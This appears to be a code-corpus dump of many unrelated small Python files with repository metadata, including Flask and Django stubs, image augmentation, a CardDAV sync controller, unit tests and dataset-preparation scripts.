] | null | null | null | app/controllers/user.py | souravlahoti/GithubAction | 6cda8f4ab022f78df7539b32571c1406f8943ad5 | [
"MIT"
] | null | null | null | app/controllers/user.py | souravlahoti/GithubAction | 6cda8f4ab022f78df7539b32571c1406f8943ad5 | [
"MIT"
] | null | null | null | from flask import jsonify
from flask_restful import Resource
class User(Resource):
def get(self, id):
data = {'name': 'nabin khadka'}
return jsonify(data)
def put(self, id):
pass
def patch(self, id):
pass
def delete(self, id):
pass
class UserList(Resource):
def get(self):
data = [{'name': 'nabin khadka', 'email': 'sourav@gmail.com'}]
return jsonify(data)
def post(self):
pass
| 16.964286 | 70 | 0.572632 | 408 | 0.858947 | 0 | 0 | 0 | 0 | 0 | 0 | 65 | 0.136842 |
0dea7700259f79cf79e451f3837519f4601762ad | 2,079 | py | Python | src/data_augmentation.py | AnweshCR7/autonomous_greenhouse | a29cfe37d0152001d2544216ed65c3472f572b4e | [
"MIT"
] | 1 | 2021-08-09T14:59:16.000Z | 2021-08-09T14:59:16.000Z | src/data_augmentation.py | AnweshCR7/autonomous_greenhouse | a29cfe37d0152001d2544216ed65c3472f572b4e | [
"MIT"
] | null | null | null | src/data_augmentation.py | AnweshCR7/autonomous_greenhouse | a29cfe37d0152001d2544216ed65c3472f572b4e | [
"MIT"
] | null | null | null | import os
import cv2
import glob
import random
import numpy as np
import matplotlib.pyplot as plt
def plot_image(img):
plt.axis("off")
plt.imshow(img, origin='upper')
plt.show()
def flip(img, dir_flag):
# if flag:
return cv2.flip(img, dir_flag)
# else:
# return img
def brightness(img, low, high):
value = random.uniform(low, high)
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
hsv = np.array(hsv, dtype = np.float64)
hsv[:,:,1] = hsv[:,:,1]*value
hsv[:,:,1][hsv[:,:,1]>255] = 255
hsv[:,:,2] = hsv[:,:,2]*value
hsv[:,:,2][hsv[:,:,2]>255] = 255
hsv = np.array(hsv, dtype = np.uint8)
img = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)
return img
def augment(dataset_dir, augmentations, save_copy=False):
image_paths = glob.glob(f"{dataset_dir}/RGB_*.png")
# Lets apply the augmentation to each image!
for image_path in image_paths[:1]:
# Will be useful for saving
img_filename = image_path.split('/')[-1].split('.')[0]
img = cv2.imread(image_path)
# Horizontal Flip -> flip(img, True)
img_hf = flip(img, 1)
if save_copy:
cv2.imwrite(f"{dataset_dir}/hf_{img_filename}", img_hf)
# Maybe we apply vertical flip to the horizontally flipped images as well?
# For now hard coding that process i.e. VF(HF(img)) by saving two copies
# Vertical Flip -> flip(img, False)
img_vf = flip(img, 0)
if save_copy:
cv2.imwrite(f"{dataset_dir}/vf_{img_filename}", img_vf)
# apply vertical flip to a horizontally flipped image.
cv2.imwrite(f"{dataset_dir}/vfhf_{img_filename}", flip(img_hf, 0))
# # Horizontal Flip
# img_hf = horizontal_flip(img, True)
# if save_copy:
# cv2.imwrite(f"{dataset_dir}/hf_{img_filename}", img_hf)
if __name__ == '__main__':
dataset_dir = "../data/FirstTrainingData_AUG"
augmentations = ["horizontal_flip"]
# expect to increase the dataset 4x
augment(dataset_dir, augmentations, save_copy=False) | 30.573529 | 82 | 0.622896 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 748 | 0.359788 |
0deb0c0b3259efb2f490fa173e3f279fb4d413e1 | 703 | py | Python | hashmap-left-join/hashmap_left_join/left_join.py | Sewar-web/data-structures-and-algorithms1 | d94f706fb3a30c114bd08a6c2d9b7ed269bc9a21 | [
"MIT"
] | null | null | null | hashmap-left-join/hashmap_left_join/left_join.py | Sewar-web/data-structures-and-algorithms1 | d94f706fb3a30c114bd08a6c2d9b7ed269bc9a21 | [
"MIT"
] | null | null | null | hashmap-left-join/hashmap_left_join/left_join.py | Sewar-web/data-structures-and-algorithms1 | d94f706fb3a30c114bd08a6c2d9b7ed269bc9a21 | [
"MIT"
] | 1 | 2021-06-26T09:19:43.000Z | 2021-06-26T09:19:43.000Z | import os
def left_join( hash , hash1):
words = []
for value in hash.keys():
if value in hash1.keys():
words.append([value, hash [value],hash1[value] ])
else:
words.append([value, hash [value],'NULL' ])
return words
if __name__ == "__main__":
hash = {
'fond':'enamored',
'wrath':'anger',
'diligent':'employed',
'outfit':'garb',
'guide':'usher'
}
hash1 = {
'fond':'averse',
'wrath':'delight',
'diligent':'idle',
'guide':'follow',
'flow':'jam'
}
print(left_join(hash,hash1) )
| 17.146341 | 61 | 0.439545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 166 | 0.236131 |
0deb37fe04b5be7b019c80d0f79badcb0721fecc | 2,583 | py | Python | datable/web/columns.py | ofirr/dojango-datable | c4d27c23d66c023062270a31f05e21d0982e0b43 | [
"MIT"
] | null | null | null | datable/web/columns.py | ofirr/dojango-datable | c4d27c23d66c023062270a31f05e21d0982e0b43 | [
"MIT"
] | null | null | null | datable/web/columns.py | ofirr/dojango-datable | c4d27c23d66c023062270a31f05e21d0982e0b43 | [
"MIT"
] | null | null | null | # /usr/bin/env python
# -*- encoding: utf-8 -*-
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
from datable.core.serializers import BooleanSerializer
from datable.core.serializers import DateSerializer
from datable.core.serializers import DateTimeSerializer
from datable.core.serializers import TimedeltaSerializer
from datable.core.serializers import StringSerializer
class Column(object):
label = None
width = None
sortable = None
serializer = None
serializerClass = None
formatter = None
sortColumnName = None # Parameter for QuerySet.order_by
def __init__(self, name, label=None, width=None,
serializer=None, sortable=None, sortColumnName=None):
self.name = name
if label is not None:
self.label = label
if self.label is None:
self.label = _(capfirst(self.name.replace("_", " ")))
if width is not None:
self.width = width
if sortable is not None:
self.sortable = sortable
if serializer is not None:
self.serializer = serializer
if self.serializer is None:
self.serializer = self.serializerClass(self.name)
if sortColumnName is not None:
self.sortColumnName = sortColumnName
if self.sortColumnName is None and self.sortable:
self.sortColumnName = name
def sortQuerySet(self, querySet, desc):
"""The query set needs to be sorted using this column.
"""
sort = self.sortColumnName
if sort is None:
raise Exception("This column can not be used to sort")
if desc:
sort = '-' + sort
return querySet.order_by(sort)
def getName(self):
return self.name
def getSerializer(self):
return self.serializer
def getLabel(self):
return self.label
def getFormatter(self):
return self.formatter
class StringColumn(Column):
serializerClass = StringSerializer
sortable = True
class DateColumn(Column):
serializerClass = DateSerializer
sortable = True
class DateTimeColumn(Column):
serializerClass = DateTimeSerializer
sortable = True
class TimedeltaColumn(Column):
serializerClass = TimedeltaSerializer
sortable = True
class BooleanColumn(Column):
serializerClass = BooleanSerializer
sortable = True
class ImageColumn(Column):
formatter = 'image'
sortable = False
class HrefColumn(Column):
formatter = 'href'
sortable = False
| 23.697248 | 70 | 0.663957 | 2,145 | 0.83043 | 0 | 0 | 0 | 0 | 0 | 0 | 204 | 0.078978 |
0deb6190172a042c803576352b9c214cd3809bff | 1,233 | py | Python | maskrcnn_benchmark/modeling/roi_heads/car_cls_rot_head/roi_car_cls_rot_predictor.py | witwitchayakarn/6DVNET | f13b35162ad90fa49d777f3a41383e9d34eb4820 | [
"MIT"
] | null | null | null | maskrcnn_benchmark/modeling/roi_heads/car_cls_rot_head/roi_car_cls_rot_predictor.py | witwitchayakarn/6DVNET | f13b35162ad90fa49d777f3a41383e9d34eb4820 | [
"MIT"
] | null | null | null | maskrcnn_benchmark/modeling/roi_heads/car_cls_rot_head/roi_car_cls_rot_predictor.py | witwitchayakarn/6DVNET | f13b35162ad90fa49d777f3a41383e9d34eb4820 | [
"MIT"
] | null | null | null | from torch import nn
import torch.nn.functional as F
class FPNPredictor(nn.Module):
def __init__(self, cfg):
super().__init__()
representation_size = cfg.MODEL.ROI_CAR_CLS_ROT_HEAD.MLP_HEAD_DIM
num_car_classes = cfg.MODEL.ROI_CAR_CLS_ROT_HEAD.NUMBER_CARS
num_rot = cfg.MODEL.ROI_CAR_CLS_ROT_HEAD.NUMBER_ROTS
self.cls_score = nn.Linear(representation_size, num_car_classes)
self.rot_pred = nn.Linear(representation_size, num_rot)
nn.init.normal_(self.cls_score.weight, std=0.01)
nn.init.constant_(self.cls_score.bias, 0)
nn.init.normal_(self.rot_pred.weight, std=0.001)
nn.init.constant_(self.rot_pred.bias, 0)
for l in [self.cls_score, self.rot_pred]:
nn.init.constant_(l.bias, 0)
def forward(self, x):
cls_score = self.cls_score(x)
cls = F.softmax(cls_score, dim=1)
rot_pred = self.rot_pred(x)
rot_pred = F.normalize(rot_pred, p=2, dim=1)
return cls_score, cls, rot_pred
_ROI_CAR_CLS_ROT_PREDICTOR = {"FPNPredictor": FPNPredictor}
def make_roi_car_cls_rot_predictor(cfg):
func = _ROI_CAR_CLS_ROT_PREDICTOR[cfg.MODEL.ROI_CAR_CLS_ROT_HEAD.PREDICTOR]
return func(cfg) | 32.447368 | 79 | 0.696675 | 972 | 0.788321 | 0 | 0 | 0 | 0 | 0 | 0 | 14 | 0.011354 |
0decb58388efdb35753edb1a250f99a3c2fcefa4 | 771 | py | Python | coderdojochi/migrations/0021_auto_20180815_1757.py | rgroves/weallcode-website | ead60d3272dbbfe610b2d500978d1de44aef6386 | [
"MIT"
] | 15 | 2019-05-04T00:24:00.000Z | 2021-08-21T16:34:05.000Z | coderdojochi/migrations/0021_auto_20180815_1757.py | rgroves/weallcode-website | ead60d3272dbbfe610b2d500978d1de44aef6386 | [
"MIT"
] | 73 | 2019-04-24T15:53:42.000Z | 2021-08-06T20:41:41.000Z | coderdojochi/migrations/0021_auto_20180815_1757.py | rgroves/weallcode-website | ead60d3272dbbfe610b2d500978d1de44aef6386 | [
"MIT"
] | 20 | 2019-04-26T20:13:08.000Z | 2021-06-21T14:53:21.000Z | # Generated by Django 2.0.6 on 2018-08-15 22:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('coderdojochi', '0020_mentor_shirt_size'),
]
operations = [
migrations.AddField(
model_name='mentor',
name='home_address',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='mentor',
name='phone',
field=models.CharField(blank=True, max_length=255, null=True),
),
migrations.AddField(
model_name='mentor',
name='work_place',
field=models.CharField(blank=True, max_length=255, null=True),
),
]
| 26.586207 | 74 | 0.581064 | 678 | 0.879377 | 0 | 0 | 0 | 0 | 0 | 0 | 142 | 0.184176 |
0def13794ee3ca070ffd095ffc65ba6c515362be | 350 | py | Python | archives/build_wget.py | onai/code-ecosystem-analyzer | 964d1ef5ec4d8f774c52aa2718663bb455d62ecb | [
"Apache-2.0"
] | null | null | null | archives/build_wget.py | onai/code-ecosystem-analyzer | 964d1ef5ec4d8f774c52aa2718663bb455d62ecb | [
"Apache-2.0"
] | null | null | null | archives/build_wget.py | onai/code-ecosystem-analyzer | 964d1ef5ec4d8f774c52aa2718663bb455d62ecb | [
"Apache-2.0"
] | null | null | null | import sys
with open(sys.argv[1]) as handle:
for new_line in handle:
dest = new_line.split('/')[4] + '_' + new_line.split('/')[5] + '.zip'
#print('curl -Ls -I -o /dev/null -w \'%{url_effective}\\n\' ' + new_line.strip())
print('curl -L --user ' + sys.argv[2] + ':' + sys.argv[3] + ' ' + new_line.strip() + ' -o ' + dest)
| 43.75 | 107 | 0.525714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 125 | 0.357143 |
0df3e3502236c625d081f0f74dbbd4aea76a92c9 | 630 | py | Python | authors/apps/followers/models.py | andela/ah-code-titans | 4f1fc77c2ecdf8ca15c24327d39fe661eac85785 | [
"BSD-3-Clause"
] | null | null | null | authors/apps/followers/models.py | andela/ah-code-titans | 4f1fc77c2ecdf8ca15c24327d39fe661eac85785 | [
"BSD-3-Clause"
] | 20 | 2018-11-26T16:22:46.000Z | 2018-12-21T10:08:25.000Z | authors/apps/followers/models.py | andela/ah-code-titans | 4f1fc77c2ecdf8ca15c24327d39fe661eac85785 | [
"BSD-3-Clause"
] | 3 | 2019-01-24T15:39:42.000Z | 2019-09-25T17:57:08.000Z | from django.db import models
from ..authentication.models import User
class Follower(models.Model):
"""
Store data on following statistics for users.
"""
user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='follower')
followed = models.ForeignKey(User, on_delete=models.CASCADE, related_name='followed')
followed_at = models.DateTimeField(auto_created=True, auto_now_add=True)
class Meta:
unique_together = ('user', 'followed')
def __str__(self):
return '{follower} follows {followed}'.format(
follower=self.user, followed=self.followed
)
| 30 | 89 | 0.696825 | 556 | 0.88254 | 0 | 0 | 0 | 0 | 0 | 0 | 128 | 0.203175 |
0df56e29aeb7cee2f088a3c93b1f67587665424d | 477 | py | Python | dbt/adapters/doris/__init__.py | qiulin/dbt-doris | 4786532ed288b32a729675a4dd01b6e4da993c60 | [
"Apache-2.0"
] | 2 | 2022-02-06T02:15:33.000Z | 2022-02-22T03:58:53.000Z | dbt/adapters/doris/__init__.py | qiulin/dbt-doris | 4786532ed288b32a729675a4dd01b6e4da993c60 | [
"Apache-2.0"
] | null | null | null | dbt/adapters/doris/__init__.py | qiulin/dbt-doris | 4786532ed288b32a729675a4dd01b6e4da993c60 | [
"Apache-2.0"
] | null | null | null | from dbt.adapters.doris.connections import DorisConnectionManager
from dbt.adapters.doris.connections import DorisCredentials
from dbt.adapters.doris.relation import DorisRelation
from dbt.adapters.doris.column import DorisColumn
from dbt.adapters.doris.impl import DorisAdapter
from dbt.adapters.base import AdapterPlugin
from dbt.include import doris
Plugin = AdapterPlugin(
adapter=DorisAdapter,
credentials=DorisCredentials,
include_path=doris.PACKAGE_PATH)
| 31.8 | 65 | 0.840671 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0df7ced38cda902e631d021c1255e468e0aeb410 | 750 | py | Python | revelation/core/urls.py | Federico-Comesana/revelatte | ccd50831dcdec8bc4a7e83b062d0309f6e4feee2 | [
"MIT"
] | null | null | null | revelation/core/urls.py | Federico-Comesana/revelatte | ccd50831dcdec8bc4a7e83b062d0309f6e4feee2 | [
"MIT"
] | null | null | null | revelation/core/urls.py | Federico-Comesana/revelatte | ccd50831dcdec8bc4a7e83b062d0309f6e4feee2 | [
"MIT"
] | null | null | null | from django.contrib.auth.decorators import login_required
from django.conf.urls import url
import views
urlpatterns = [
url(r'public/$',
views.RevelationModelListView.as_view(),
name='revelation-list'),
url(r'u/(?P<pk>\d+)/$',
views.UserProfileView.as_view(),
name='user-view'),
url(r'delete/(?P<pk>\d+)/$',
login_required(views.RevelationModelDeleteView.as_view()),
name='revelation-delete'),
url(r'create/$', views.RevelationModelCreateView.as_view(),
name='revelation-create'),
url(r'r/(?P<pk>\d+)/$',
views.RevelationModelDetailView.as_view(),
name='revelation-view'),
url(r'^$',
views.HomePageView.as_view(),
name='home'),
]
| 24.193548 | 66 | 0.617333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 175 | 0.233333 |
0df83b2e848cfa6dd57435a1970875947775c426 | 6,395 | py | Python | pycarddav/controllers.py | mathstuf/pycarddav | 8bfdbef79c11ed9b14304773d26b1542d16ef2b2 | [
"MIT"
] | null | null | null | pycarddav/controllers.py | mathstuf/pycarddav | 8bfdbef79c11ed9b14304773d26b1542d16ef2b2 | [
"MIT"
] | null | null | null | pycarddav/controllers.py | mathstuf/pycarddav | 8bfdbef79c11ed9b14304773d26b1542d16ef2b2 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# vim: set ts=4 sw=4 expandtab sts=4:
# Copyright (c) 2011-2013 Christian Geier & contributors
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
syncs the remote database to the local db
"""
from pycarddav import backend
from pycarddav import carddav
from pycarddav import model
from pycarddav import ui
from os import path
import logging
import sys
def query(conf):
# testing if the db exists
if not path.exists(conf.sqlite__path):
sys.exit(str(conf.sqlite__path) + " file does not exist, please sync"
" with pycardsyncer first.")
search_string = conf.cmd__search_string.decode("utf-8")
my_dbtool = backend.SQLiteDb(conf.sqlite__path, "utf-8", "stricts", False)
#import:
if conf.cmd__importing:
cards = model.cards_from_file(conf.cmd__importing)
for card in cards:
my_dbtool.update(card, status=backend.NEW)
sys.exit()
# backup:
if conf.cmd__backup:
with open(conf.cmd__backup, 'w') as vcf_file:
if search_string == "":
hreflist = my_dbtool.get_all_vref_from_db()
else:
hreflist = my_dbtool.search(search_string)
for href in hreflist:
vcard = my_dbtool.get_vcard_from_db(href)
vcf_file.write(vcard.vcf.encode('utf-8'))
sys.exit()
# editing a card:
#if conf.cmd__edit:
# names = my_dbtool.select_entry2(search_string)
# href = ui.select_entry(names)
# if href is None:
# sys.exit("Found no matching cards.")
# mark a card for deletion
if conf.cmd__delete:
hrefs = my_dbtool.search(search_string)
if len(hrefs) is 0:
sys.exit('Found no matching cards.')
elif len(hrefs) is 1:
href = hrefs[0]
else:
pane = ui.VCardChooserPane(my_dbtool, hrefs)
ui.start_pane(pane)
card = pane._walker.selected_vcard
href = card.href
if href in my_dbtool.get_new():
# cards not yet on the server get deleted directly, otherwise we
# will try to delete them on the server later (where they don't
# exist) and this will raise an exception
my_dbtool.delete_vcard_from_db(href)
else:
my_dbtool.mark_delete(href)
print('vcard "%s" deleted from local db, will be deleted ' % href +
'on the server on the next sync')
sys.exit()
print("searching for " + conf.cmd__search_string + "...")
result = my_dbtool.search(search_string)
for one in result:
vcard = my_dbtool.get_vcard_from_db(one)
if conf.cmd__mutt:
lines = vcard.print_email()
elif conf.cmd__tel:
lines = vcard.print_tel()
elif conf.cmd__display_all:
lines = vcard.pretty
else:
lines = vcard.pretty_min
if not lines == '':
print(lines.encode('utf-8'))
return 0
def sync(conf):
"""this should probably be seperated from the class definitions"""
syncer = carddav.PyCardDAV(conf.dav__resource,
user=conf.dav__user,
passwd=conf.dav__passwd,
write_support=conf.write_support,
verify=conf.dav__verify,
auth=conf.dav__auth)
my_dbtool = backend.SQLiteDb(conf.sqlite__path, "utf-8", "stricts", conf.debug)
# sync:
abook = syncer.get_abook() # type (abook): dict
for href, etag in abook.iteritems():
if my_dbtool.needs_update(href, etag):
logging.debug("getting %s etag: %s", href, etag)
vcard = syncer.get_vcard(href)
my_dbtool.update(vcard, href, etag=etag)
remote_changed = False
# for now local changes overwritten by remote changes
logging.debug("looking for locally changed vcards...")
hrefs = my_dbtool.changed
for href in hrefs:
logging.debug("trying to update %s", href)
card = my_dbtool.get_vcard_from_db(href)
logging.debug("%s", my_dbtool.get_etag(href))
syncer.update_vcard(card.vcf, href, None)
my_dbtool.reset_flag(href)
remote_changed = True
# uploading
hrefs = my_dbtool.get_new()
for href in hrefs:
logging.debug("trying to upload new card %s", href)
card = my_dbtool.get_vcard_from_db(href)
(href_new, etag_new) = syncer.upload_new_card(card.vcf)
my_dbtool.update_href(href, href_new, status=backend.OK)
remote_changed = True
# deleting locally deleted cards on the server
hrefs_etags = my_dbtool.get_marked_delete()
for href, etag in hrefs_etags:
logging.debug('trying to delete card %s', href)
syncer.delete_vcard(href, etag)
my_dbtool.delete_vcard_from_db(href)
remote_changed = True
# detecting remote-deleted cards
# is there a better way to compare a list of unicode() with a list of str()
# objects?
if remote_changed:
abook = syncer.get_abook() # type (abook): dict
rlist = my_dbtool.get_all_vref_from_db_not_new()
delete = set(rlist).difference(abook.keys())
for href in delete:
my_dbtool.delete_vcard_from_db(href)
| 36.542857 | 83 | 0.640813 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,376 | 0.37154 |
0dfaaf84879c7de397b353788d87c5237fcb9080 | 2,483 | py | Python | _test_request.py | arshadkazmi42/crul | 7b0b7674afaf4d8c75d961612f6813e97a7d7008 | [
"MIT"
] | 6 | 2021-05-18T13:47:55.000Z | 2021-12-16T18:18:41.000Z | _test_request.py | arshadkazmi42/crul | 7b0b7674afaf4d8c75d961612f6813e97a7d7008 | [
"MIT"
] | null | null | null | _test_request.py | arshadkazmi42/crul | 7b0b7674afaf4d8c75d961612f6813e97a7d7008 | [
"MIT"
] | 2 | 2022-01-05T04:56:46.000Z | 2022-01-12T05:10:57.000Z | import unittest
from unittest.mock import Mock, patch
from request import Request
RESPONSE = {
"status": "success",
"message": "Processed"
}
class Response:
def __init__(self):
self.text = RESPONSE['message']
def json(self):
return RESPONSE
mock_response = Response()
class TestRequest(unittest.TestCase):
def test_init(self):
request = Request()
self.assertNotEqual(request.headers, None, f'Should not be None')
self.assertNotEqual(request.timeout, None, f'Should not be None')
@patch('request.requests.head')
def test_head(self, mock_head):
URL = 'https://example.com/working'
mock_head.return_value.status_code = 200
request = Request()
self.assertEqual(request.head(URL).status_code, 200, f'Should return 200 status code')
@patch('request.requests.head')
def test_status_code_400(self, mock_head):
URL = 'https://example.com/not_found'
mock_head.return_value.status_code = 400
request = Request()
self.assertEqual(request.get_status_code(URL), 400, f'Should return 400 status code')
@patch('request.requests.get')
def test_get(self, mock_get):
URL = 'https://example.com/working'
mock_get.return_value = mock_response
request = Request()
response = request.get(URL)
response = response.json()
self.assertEqual(response['status'], RESPONSE['status'], f'Should return success status')
self.assertEqual(response['message'], RESPONSE['message'], f'Should return Processed message')
@patch('request.requests.get')
def test_get_text_response(self, mock_post):
URL = 'https://example.com/working'
mock_post.return_value = mock_response
request = Request()
response = request.get_text_response(URL)
self.assertEqual(response, RESPONSE['message'], f'Should {RESPONSE["message"]} message')
@patch('request.requests.get')
def test_get_json_response(self, mock_post):
URL = 'https://example.com/working'
mock_post.return_value = mock_response
request = Request()
response = request.get_json_response(URL)
self.assertEqual(response['status'], RESPONSE['status'], f'Should return success status')
self.assertEqual(response['message'], RESPONSE['message'], f'Should return Processed message')
if __name__ == '__main__':
unittest.main() | 26.136842 | 102 | 0.662908 | 2,250 | 0.906162 | 0 | 0 | 1,854 | 0.746677 | 0 | 0 | 667 | 0.268627 |
216e58dc7513012f69f864fede95e2d9e5c499dc | 470 | py | Python | kirbytoolkit/tests/test_jackknife.py | matthewkirby/kirby_toolkit | 37968dfd05d628694f3c52a23a15641aa8eee5ff | [
"MIT"
] | null | null | null | kirbytoolkit/tests/test_jackknife.py | matthewkirby/kirby_toolkit | 37968dfd05d628694f3c52a23a15641aa8eee5ff | [
"MIT"
] | null | null | null | kirbytoolkit/tests/test_jackknife.py | matthewkirby/kirby_toolkit | 37968dfd05d628694f3c52a23a15641aa8eee5ff | [
"MIT"
] | null | null | null | import numpy as np
import kirbytoolkit as ktk
def test_jackknife_arr():
arr = [1, 2, 2, 3, 4]
jkvar_true = 0.26
jkvar_code = ktk.jackknife_array(arr)
np.testing.assert_almost_equal(jkvar_code, jkvar_true, decimal=7)
# Test a longer array
arr = np.loadtxt('randomdata.dat')
jkvar_true = 0.003031329328040*0.003031329328040
jkvar_code = ktk.jackknife_array(arr)
np.testing.assert_almost_equal(jkvar_code, jkvar_true, decimal=7)
| 27.647059 | 69 | 0.717021 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 37 | 0.078723 |
216ebd24f2457cf9469911c06b29cd3b21471003 | 530 | py | Python | demo-001.py | zhouyuanmin/MyCode | dbc7df8dc5eba419340ef9aafed75af24f883381 | [
"MIT"
] | 1 | 2021-01-22T03:15:29.000Z | 2021-01-22T03:15:29.000Z | demo-001.py | zhouyuanmin/MyCode | dbc7df8dc5eba419340ef9aafed75af24f883381 | [
"MIT"
] | null | null | null | demo-001.py | zhouyuanmin/MyCode | dbc7df8dc5eba419340ef9aafed75af24f883381 | [
"MIT"
] | null | null | null | """
使用装饰器限制函数的调用次数
"""
import functools
def call_limit(count):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if decorator.calls >= count:
raise AssertionError(f"单个程序最多允许调用此方法{count}次")
decorator.calls += 1
return func(*args, **kw)
decorator.calls = 0
return wrapper
return decorator
@call_limit(5)
def demo(a, b):
print(a, b)
if __name__ == '__main__':
for i in range(20):
demo(i, i ** 2)
| 17.096774 | 62 | 0.558491 | 0 | 0 | 0 | 0 | 304 | 0.518771 | 0 | 0 | 112 | 0.191126 |
216ee6cd0a2a320e0ac816601363649bae571b45 | 1,691 | py | Python | test/tests/set.py | jvkersch/pyston | 2c7e7a5e0ed7a0a8b4528919f855fa8336b43902 | [
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | test/tests/set.py | jvkersch/pyston | 2c7e7a5e0ed7a0a8b4528919f855fa8336b43902 | [
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | test/tests/set.py | jvkersch/pyston | 2c7e7a5e0ed7a0a8b4528919f855fa8336b43902 | [
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | s1 = {1}
def sorted(s):
l = list(s)
l.sort()
return repr(l)
s1 = set() | set(range(3))
print sorted(s1)
s2 = set(range(1, 5))
print sorted(s2)
print repr(sorted(s1)), str(sorted(s1))
print sorted(s1 - s2)
print sorted(s2 - s1)
print sorted(s1 ^ s2)
print sorted(s1 & s2)
print sorted(s1 | s2)
print len(set(range(5)))
s = set(range(5))
print sorted(s)
s.add(3)
print sorted(s)
s.add("")
print len(s)
s.add(None)
print len(s)
print set([1])
for i in set([1]):
print i
s = frozenset(range(5))
print len(s)
print sorted(s)
print frozenset()
print hasattr(s, "remove")
print hasattr(s, "add")
print frozenset() | frozenset()
print set() | frozenset()
print frozenset() | set()
print set() | set()
for i in xrange(8):
print i, i in set(range(2, 5))
print i, i in frozenset(range(2, 5))
s = set(range(5))
print len(s)
s.clear()
print s
s.update((10, 15))
print sorted(s)
s.update((10, 15), range(8))
print sorted(s)
s.remove(6)
print sorted(s)
try:
s.remove(6)
except KeyError, e:
print e
def f2():
print {5}
f2()
s = set([])
s2 = s.copy()
s.add(1)
print s, s2
s1 = set([3, 5])
s2 = set([1, 5])
print sorted(s1.union(s2)), sorted(s1.intersection(s2))
print sorted(s1.union(range(5, 7))), sorted(s1.intersection(range(5, 7)))
print sorted(s2.union([], [], [], [])), sorted(s2.intersection())
s = frozenset([1, 5])
d = s.difference([1], [1], [2])
print d, len(s)
print
l = []
s = set(range(5))
while s:
l.append(s.pop())
l.sort()
print l
s = set([1])
s.discard(1)
print s
s.discard(1)
print s
s = set(range(5))
for i in xrange(10):
s2 = set(range(i))
print s.issubset(s2), s.issuperset(s2), s == s2, s != s2, s.difference(s2)
| 15.234234 | 78 | 0.608516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15 | 0.00887 |
216f4275a182a3efa14efecfb81fc95c79e95c84 | 2,720 | py | Python | scripts/gen_train_test.py | wesleylp/CPE775 | 3df3c053e9d6da83035c8f2620c3951f7ff94975 | [
"MIT"
] | 13 | 2017-11-23T12:23:50.000Z | 2020-12-27T10:36:08.000Z | scripts/gen_train_test.py | wesleylp/CPE775 | 3df3c053e9d6da83035c8f2620c3951f7ff94975 | [
"MIT"
] | 1 | 2018-04-19T02:16:34.000Z | 2018-04-19T13:37:23.000Z | scripts/gen_train_test.py | wesleylp/CPE775 | 3df3c053e9d6da83035c8f2620c3951f7ff94975 | [
"MIT"
] | 3 | 2018-11-15T00:01:09.000Z | 2021-05-11T06:27:46.000Z | import os
import argparse
import glob
import pandas as pd
from cpe775 import utils
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('data_dir', metavar='DIR')
parser.add_argument('--out-dir', metavar='DIR')
args = parser.parse_args()
# Output to the data dir file if out dir was not set
args.out_dir = args.out_dir or args.data_dir
train_files = glob.glob(os.path.join(args.data_dir, 'helen', 'trainset', '**', '*.pts'), recursive=True)
train_files += glob.glob(os.path.join(args.data_dir, 'lfpw', 'trainset', '**', '*.pts'), recursive=True)
train_files += glob.glob(os.path.join(args.data_dir, 'afw', '**', '*.pts'), recursive=True)
print('Found {} train files'.format(len(train_files)))
train_set_fname = os.path.join(args.out_dir, 'train.csv')
train_df = utils.read_pts(train_files, common_path=args.data_dir)
train_df.to_csv(train_set_fname, header=None, index=False)
print('Saving train set at {}'.format(os.path.abspath(train_set_fname)))
common_test_files = glob.glob(os.path.join(args.data_dir, 'helen', 'testset', '**', '*.pts'), recursive=True)
common_test_files += glob.glob(os.path.join(args.data_dir, 'lfpw', 'testset', '**', '*.pts'), recursive=True)
print('Found {} files from the common subset of the 300W public test set'.format(len(common_test_files)))
common_set_fname = os.path.join(args.out_dir, 'common_test.csv')
common_df = utils.read_pts(common_test_files, common_path=args.data_dir)
common_df.to_csv(common_set_fname, header=None, index=False)
print('Saving common subset at {}'.format(os.path.abspath(common_set_fname)))
challenging_test_files = glob.glob(os.path.join(args.data_dir, 'ibug', '**', '*.pts'), recursive=True)
print('Found {} files from the challenging subset of the 300W public test set'.format(len(challenging_test_files)))
challenging_set_fname = os.path.join(args.out_dir, 'challenging_test.csv')
challenging_df = utils.read_pts(challenging_test_files, common_path=args.data_dir)
challenging_df.to_csv(challenging_set_fname, header=None, index=False)
print('Saving challenging subset at {}'.format(os.path.abspath(challenging_set_fname)))
